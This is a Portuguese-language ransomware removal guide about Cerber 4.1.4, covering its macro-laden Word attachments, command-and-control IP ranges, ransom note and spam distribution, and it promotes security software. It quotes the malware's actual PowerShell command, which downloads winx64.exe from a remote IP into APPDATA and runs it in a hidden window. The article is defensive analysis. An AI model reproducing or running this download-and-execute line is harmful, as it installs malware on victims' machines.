Saltar para o conteúdo
  • Ativa
  • Severidade: Elevada
  • Ransomware
  • Windows
  • Verificado · Nov 2016

Vírus ransomware Cerber 4.1.4Como remover?

Um guia de remoção passo a passo para dispositivos afetados. Siga o procedimento verificado abaixo — a maioria dos leitores conclui-o em menos de 10 minutos.

Julie Splinters · Especialista em remoção de malware

O terror continua: o Cerber 4.1.4 foi lançado

O Cerber 4.1.4 é a nova sequela da campanha cibernética do Cerber. Parece que passou menos de uma semana desde que os hackers atacaram a comunidade virtual com o Cerber 4.1.0 e o Cerber 4.1.1. Talvez o tenham tomado como um ataque fraco e, consequentemente, reforçaram-no com outro ransomware da mesma série. Continua a moda de anexar extensões de caracteres aleatórios. A última versão rouba algumas dicas ao ransomware Locky pois mudou a sua ativação para uma semelhante ao mencionado malware encriptador de ficheiros. Especificamente, o Cerber 4.1.4 emprega um documento Word e pede para permitir definições macro para descarregar o seu principal executável. No entanto, esta técnica, que tem sido continuamente usada pelo Locky, foi já largamente discutida por especialistas IT. Assim sendo, utilizadores que seguem as tendências do mundo IT poderão escapar a esta ameaça cibernética. Se o malware se abateu sobre si, apesar de tudo, não precisa de entrar em pânico. Primeiro, necessitará de remover o Cerber 4.1.4  do dispositivo. Use o FortectIntego para acelerar.

A mais recente versão do ransomware continua a causar destruição por todo o mundo. Tal como nas versões 4.1.0 e 4.1.1, começou a empregar a técnica de utilização de endereço IP para enviar pacotes UDP para o seu servidor de Comando & Controlo remoto. Agora, a última versão começou a usar três conjuntos de endereços IP, 5.55.50.0/27, 192.42.118.0/27, 194.165.16.0/22, para transferir a informação técnica ao servidor. Esta particularidade permite aos hackers recolher mais informação crucial sobre os dispositivos das suas vítimas e sistemas operativos. Escusado será dizer que esta informação inspira os vilões cibernéticos a melhorar as suas estratégias de pirataria.

Cerber 4.1.4 rampages ruthlessly

A principal particularidade desta nova versão é a forma como o malware Cerber 4.1.4 lança o seu ataque desastroso. Embora diferentes versões do vírus encriptador de ficheiros tenha já empregado mensagens de e-mail e notificações de voz falsas para atacar sistemas de utilizadores, esta edição mudou para a estratégia de permissão de macros. Quando uma vítima abre o ficheiro .doc recebido, irá visualizar o documento MS Word realçado (pop-up). Contém uma linha de caracteres e códigos aleatórios. Felizmente, as últimas versões do Word desativam as definições de macro por defeito. Assim, ser-lhe-á pedido para permiti-las. Depois, quando modificadas as definições, o ransomware Cerber 4.1.4 irá correr o PowerShell. Dentro de segundos, o tipo de linha base64 irá proceder com a sua ativação. Mais tarde, termina com esta linha.

POWERSHELL.EXE -window hidden (New-Object System.Net.WebClient).DownloadFile(‘http://94.102.58.30/~trevor/winx64.exe’,”$env:APPDATA\winx64.exe”);Start-Process (“$env:APPDATA\winx64.exe”)

Como pode ver, tal comando foi efetuado para descarregar e executar o seu principal elemento de execução: win64.exe. Em caso de estar a correr o sistema 32-bit Windows; o seguinte executável poderá ser o win32.exe. Agora o vírus precisa de colocar o ficheiro na pasta %AppData% para alcançar a sua total eficiência. Como habitualmente, enquanto o vírus encripta os ficheiros, poderá notar no ficheiro Readme.hta no seu ambiente de trabalho. Quando o processo de codificação estiver completo, a sua fotografia de fundo é alterada para uma nota de resgate declarando o sequestro pelo Cerber 4.1.4. Ao empregar o valor MachineGuid, localizado na pasta HKLM\Software\Microsoft\Cryptography no computador da vítima, gera uma extensão random. Não perda tempo e prossiga com a remoção do Cerber 4.1.4.

Particularidades da distribuição

O vírus prefere usar a estratégia verificada para propagação: mensagens spam. Embora os utilizadores sejam continuamente avisados para não abrir descuidadamente faturas, formulários oficiais ou alertas policiais recebidos de remetentes desconhecidos, o número de utilizadores afetados permanece ainda elevado. Os criminosos cibernéticos poliram técnicas de persuadir os utilizadores visados a agir de acordo com o seu cenário. Todavia, se vir uma mensagem recebida do escritório do FBI ou instituição financeira, verifique o remetente antes de abrir quaisquer anexos. Poderá verificar a gramática, erros de estilo ou de digitação. A ausência de um logotipo apropriado ou credencial de um representante poderão também avisar sobre um e-mail específico.

É possível exterminar o vírus completamente?

Relativamente à remoção do Cerber 4.1.4, recomendamos que instale software de segurança confiável. Atualize-o após a instalação e inicie o scan. Programas anti-spyware, como o FortectIntego ou MalwarebytesMalwarebytes, normalmente removem o vírus Cerber 4.1.4 dentro de alguns minutos. Porém, se espera que desencriptem os ficheiros, poderá ficar desapontado. Existem outros métodos de fazê-lo embora os mais eficientes para recuperar os ficheiros sejam cópias de segurança ou desencriptador original. Em relação a isto, leia mais para informar-se sobre as nossas recomendações de recuperação de dados. Se o vírus bloqueou o seu ecrã ou não consegue correr funções de sistema básicas, aqui estão as diretrizes sobre como recuperar o acesso.

Este guia ajudou?

Seja o primeiro a comentar

SemVirus
Preferências de privacidade

Usamos cookies para melhorar a sua experiência e analisar o tráfego. Alguns cookies permitem conteúdos incorporados, como vídeos e publicações em redes sociais. Escolha o que permite — pode alterar isto a qualquer momento.